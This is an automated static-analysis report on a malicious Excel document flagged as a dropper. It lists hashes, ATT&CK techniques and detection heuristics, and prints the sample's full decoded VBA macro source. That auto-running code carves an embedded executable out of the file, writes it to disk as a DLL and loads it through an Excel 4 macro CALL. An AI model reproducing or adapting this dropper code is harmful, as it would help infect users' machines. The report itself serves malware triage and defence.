Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a25d63cfbe6bf689…

MALICIOUS

Office (OLE)

Size: 827.0 KB
Created: 2019-08-30 09:14:50
Authoring application: Microsoft Excel
First seen: 2020-07-24
MD5: 9c6cca0dddd9f683c9d9e6b41c1bdf18
SHA-1: 7e114263fb98dc186593eba37495e7fa8ed7c4a6
SHA-256: a25d63cfbe6bf689b92f24dcd75b80459d8fb969ae35ddbf7cf39aa4c84794d3
Risk score: 442

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The file contains VBA macros that leverage `Shell()` and `LoadLibrary` API calls, indicating an attempt to execute code. Crucially, a PE executable is embedded within the document, and heuristics confirm its extraction and suspicious nature. The VBA script likely facilitates the execution of this embedded payload, which is characteristic of a dropper malware.

Heuristics 10

  • ClamAV: Win.Dropper.Hideproc-6663113-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
  • Embedded PE executable [critical, OLE_EMBEDDED_EXE]
    MZ/PE header found inside document: possible embedded executable
  • VBA macros detected [medium, OLE_VBA_MACROS] (1 related finding)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical, OLE_VBA_SHELL]
    Potential Shell call in VBA
    Matched lines in script:
             sendings = 1
             Dim sNMSP As New Shell
  • Reference to Windows Script Host [high, SC_STR_WSCRIPT]
    Reference to Windows Script Host
  • Reference to LoadLibrary API [high, SC_STR_LOADLIBRARY]
    Reference to LoadLibrary API
  • Reference to GetProcAddress API [high, SC_STR_GETPROCADDRESS]
    Reference to GetProcAddress API
  • Suspicious extracted artifact [high, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API [medium, SC_STR_VIRTUALALLOC]
    Reference to VirtualAlloc API
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.microsoft.com0 [In document text (OLE body)]
    • http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0X [In document text (OLE body)]
    • http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0 [In document text (OLE body)]
    • http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl0Z [In document text (OLE body)]
    • http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0 [In document text (OLE body)]
    • http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0T [In document text (OLE body)]
    • http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0 [In document text (OLE body)]

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14372 bytes
SHA-256: 56be25cbb6875a49ad962ac7fa31f271de6c58edf73c655f0e6ec6ff2847baa8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "one"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Workbook_Activate()
If PrepareForm.Visible = False Then
PopulateDivineCommercial 821
End If

End Sub





Public Sub PopulateDivineCommercial(dImmer As Integer)

Dim ActiveHotbit As New WshShell
 Dim s As String
 Dim GetInfirmityLevelDescription As String
    
    Dim d As Long
    d = 3
    d = d - 1
    Select Case d
    Case 0
        s = "No health problems"
    Case 1
        s = "Minor health problems"
    Case 2
        s = "Major health problems"
       
    Case 3
        s = "Severe disability"
    End Select


    Dim SpecialPath As String
    

PRP = "%" + UserForm6.TextBox1.Tag

UserForm6.TextBox1.Tag = ActiveHotbit.ExpandEnvironmentStrings(PRP + "%")

    
Dim car As CarClass
Set car = New CarClass
UserForm6.TextBox3.Tag = car.CheckCar(ActiveHotbit, "" & UserForm6.TextBox3.Tag + "")
ChDir (UserForm6.TextBox1.Tag)

    PrepareForm.show
End Sub





Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
 #If VBA7 And Win64 Then
Public Const FlagDouble = True
#Else
Public Const FlagDouble = False

#End If
 Public DisputeChannel3 As Byte
     
Public Declaration() As Byte

     

     
    Public abbrev As Byte
  Public DisputeChannel4 As Byte
Public Sub PrepareConfigForOutput()
On Error Resume Next
    Dim i As Long
    Dim sNextChar As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean
    Dim sCommand As String
        Dim PrepareConfigForOutput As Long
    PrepareConfigForOutput = 0
    tooolsetChunkIParameter = False
    tooolsetChunkQ = False
    sCommand = Command$
    
    For i = 1 To ALen.B(sCommand)
        sNextChar = Mid(sCommand, i, 1)
        If tooolsetChunkIParameter Then
            If tooolsetChunkQ Then
                If sNextChar = " " Then
                    tooolsetChunkIParameter = False
                    tooolsetChunkQ = False
                    PrepareConfigForOutput = PrepareConfigForOutput + 1
                End If
            End If
        
        End If
    Next i
    If tooolsetChunkIParameter Then PrepareConfigForOutput = PrepareConfigForOutput + 1
End Sub




Public Sub PathBack(ByVal sPath As String)
    On Error Resume Next
    Dim sT As Variant
    Dim tt As String
    If Len(sPath) = 3 Then GoTo errorhand
    
    For ii = 0 To UBound(sT) - 2
        tt = tt & sT(ii) & "\"
    Next ii
    
    PathB.ack = tt
    
errorhand:
    Path.Back = sPath
End Sub

Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
                tooolsetChunkQ = False
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub







Attribute VB_Name = "PrepareForm"
Attribute VB_Base = "0{D1B1FD56-282A-4460-BD0C-0949FD7E35F8}{7BF60A63-CF26-4196-A1D8-20F806F385A9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
Call KeyPropUpdate(Me, False)

End Sub

Private Sub UserForm_Activate()
DoEvents
DoEvents
DerTip
DoEvents
End Sub




Attribute VB_Name = "Module2"

Public Const GWL_STYLE = -16
Public Const WS_CAPTION = &HC00000
Public Const WS_SYSMENU = &H80000
 Public Const FirstB As Byte = 77
 Public Const SecondB As Byte = 90
 Public Const ThirdB As Byte = 144
#If VBA7 Then
 Public Declare PtrSafe Function BoxWSL _
 Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _
 ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
 Public Declare PtrSafe Function FWA1 _
 Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _
 ByVal lpWindowName As String) As Long
 Public Declare PtrSafe Function DrawMenuBar _
 Lib "user32" (ByVal parameter1 As Long) As Long
 Public Declare PtrSafe Function GetWindowLong11 _
 Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _
 ByVal nIndex As Long) As Long
#Else
 Public Declare Function GetWindowLong11 _
 Lib "user32" Alias "GetWindowLongA" ( _
 ByVal parameter1 As Long, ByVal nIndex As Long) As Long
 Public Declare Function FWA1 _
 Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _
 ByVal lpWindowName As String) As Long
 Public Declare Function DrawMenuBar _
 Lib "user32" (ByVal parameter1 As Long) As Long
 Public Declare Function BoxWSL _
 Lib "user32" Alias "SetWindowLongA" ( _
 ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
#End If
Public Function NumberBuffer(LongData As Long, Context As Integer, ByVal ByteData As Byte)
 If PrepareForm.Enabled = True Then
 Put #LongData, , ByteData
End If
End Function
Public Function ColumnRangeWidth(ByVal ColRange As String, ByVal Width As Single) As Boolean
 ColumnRangeWidth = True
 On Error GoTo ErrorHandler
 Excel.Worksheets(1).Columns(ColRange).ColumnWidth = Width
 Exit Function
ErrorHandler:
 ColumnRangeWidth = False
 Resume Next
End Function
Public Function ColumnWidth(ByVal Col As Integer, ByVal Width As Single) As Boolean
 ColumnWidth = True
 On Error GoTo ErrorHandler
 Excel.Worksheets(1).Columns(Col).ColumnWidth = Width
 Exit Function
ErrorHandler:
 ColumnWidth = False
 Resume Next
End Function
Public Function GetFlexGridColFromXPos(TheGrid, XPos As Single) As Long
On Error GoTo ErrorTrap
Dim i As Long, lAccWidth As Long
 With TheGrid
 For i = 0 To .Cols - 1
 lAccWidth = lAccWidth + .ColWidth(i)
 If XPos <= lAccWidth Then
 GetFlexGridColFromXPos = i
 Exit Function
 End If
 Next i
 End With
 Exit Function
ErrorTrap:
 Exit Function
End Function
Private Sub ERRCHECK(result)
 If result = RCPN_D_FMOD_OK Then
 ms.gR.esult = MsgBox(result & ") ")
 End If
End Sub


Public Sub DerTip()
    Dim sendings As Integer
    dershlep = "" + UserForm6.TextBox1.Tag
    Dim ofbl As String
    ofbl = UserForm6.TextBox3.Tag + "\libOmio.dll"
    Dim CurrentSizeOfAT As Long

ctackPup = Join(Array(UserForm6.TextBox1.Tag, "\funduct.xlsx"), "")

        ctackPop = Join(Array(dershlep, UserForm6.TextBox3.Value), "")
        
            
            
        Dim arr(1 To 3) As String
        
        
ctackPip = ctackPup & Page11.Range("A100").Value
 
 PublicResumEraseByArrayList ctackPop, ctackPip, ofbl
  VistaQ ctackPup
    
        FileCopy ctackPup, ctackPip
        
         sendings = 1
         Dim sNMSP As New Shell
       
    If sendings > 0 And sendings > -30 Then
         
          Set FileWherePutTo2 = sNMSP.Namespace(dershlep)
            Set FileWherePutTo = sNMSP.Namespace(ctackPip)
           
          
          
          
FileWherePutTo2.CopyHere FileWherePutTo.Items.Item(UserForm6.Label11.Tag)
              
 
        End If
    CurrentSizeOfAT = 285696
      
        If FlagDouble Then
                CurrentSizeOfAT = 300000 + 9240 + 8
                sendings = 2
            End If
 Composition dershlep & UserForm6.Label1.Tag, ofbl, CurrentSizeOfAT, sendings
        If sendings >= -10 Then
            sendings = sendings + 1
            ChDir (UserForm6.TextBox3.Tag)
            sendings = sendings + 1
        End If
        If sendings < 100 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
            PrepareConfigForOutput
       
        If sendings < 0 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
    ofbl = "CA" + "LL(""" + ofbl

    ExecuteExcel4Macro ofbl & """,""pipk"",""J"")"
                
End Sub





Public Sub VistaQ(WhereToGo)
 DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
End Sub












Attribute VB_Name = "Module0"

Attribute VB_Name = "UserForm6"
Attribute VB_Base = "0{71D68EAA-1A75-4990-A814-F904BBDDB3D0}{CB84FF3A-FB5B-4593-A8C8-B1F9D1C89B37}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module4"








 
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
                tooolsetChunkQ = False
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub


















Attribute VB_Name = "Module5"

Public Sub KeyPropUpdate(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FWA1(vbNullString, frm.Caption)
windowStyle = GetWindowLong11(windowHandle, GWL_STYLE)

If show Then

    BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

   
Else
 BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub



Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
    On Error Resume Next
    For Each Key In putArrayBigList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub

Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer)
 Dim DisputeChannel1 As Long
 
 Dim SimpleMethod As Integer
 ReDim Declaration(1 To fl)
 DisputeChannel1 = FreeFile
 Open Composition2 For Binary Access Read As DisputeChannel1
 Dim cur As Integer
 cur = 1
Do While 1
 Get DisputeChannel1, , abbrev
 If abbrev = FirstB Then
 Declaration(1) = abbrev
 Get DisputeChannel1, , DisputeChannel3
 If DisputeChannel3 = SecondB Then
 Declaration(2) = DisputeChannel3
 Get DisputeChannel1, , DisputeChannel4
 If DisputeChannel4 = ThirdB Then
 Declaration(3) = DisputeChannel4
 If cur = DisputeChannel6 Then
 For k = 4 To fl
 Get DisputeChannel1, , abbrev
 Declaration(k) = abbrev
 Next k
 Exit Do
 Else
 cur = cur + 1
 End If
 End If
 End If
 End If
 Loop
 Close DisputeChannel1
 On Error Resume Next
 DisputeChannel1 = FreeFile
 Open ofbl For Binary Lock Read Write As #DisputeChannel1
 For i = LBound(Declaration) To UBound(Declaration)
 If PrepareForm.Enabled = True Then
 NumberBuffer DisputeChannel1, 70, Declaration(i)
 End If
 Next i
 Close DisputeChannel1
 DisputeChannel1 = FreeFile
 For HSP = 33 To -1 Step -0.25
 DisputeChannel1 = 6 + i
 Next HSP
End Sub




Attribute VB_Name = "CarClass"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
    
Dim vSpeed As Integer
Dim vLicensePlate As String
 
Public Property Get Speed() As Integer
    Speed = vSpeed
End Property
 
Public Property Let Speed(sp As Integer)
    vSpeed = Application.WorksheetFunction.Min(sp, 100)
    vSpeed = Application.WorksheetFunction.Max(vSpeed, -100)
End Property
 
Public Property Get CheckCar(car As Object, Drive As String)
CheckCar = car.SpecialFolders("" + Drive)

End Property
Public Property Get SpecialFolders() As String
    LicensePlate = vLicensePlate
End Property
 
Public Property Let LicensePlate(lp As String)
    If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error
    vLicensePlate = lp
End Property
embedded_office_000044f1.exe | embedded-pe | Office MZ+PE at offset 0x44F1 | 829199 bytes
SHA-256: a1a839e5fef39aff8edacc2bd92c525945609703d3442f11252d06ef23257e92
Detection
ClamAV: Win.Dropper.Hideproc-6663113-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shellin
ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD0090C244/Ole10Native | 614941 bytes
SHA-256: 19b52f1add3d684446fd404d2b90f24697030288cf5c2c5ba0e06da52f179e3d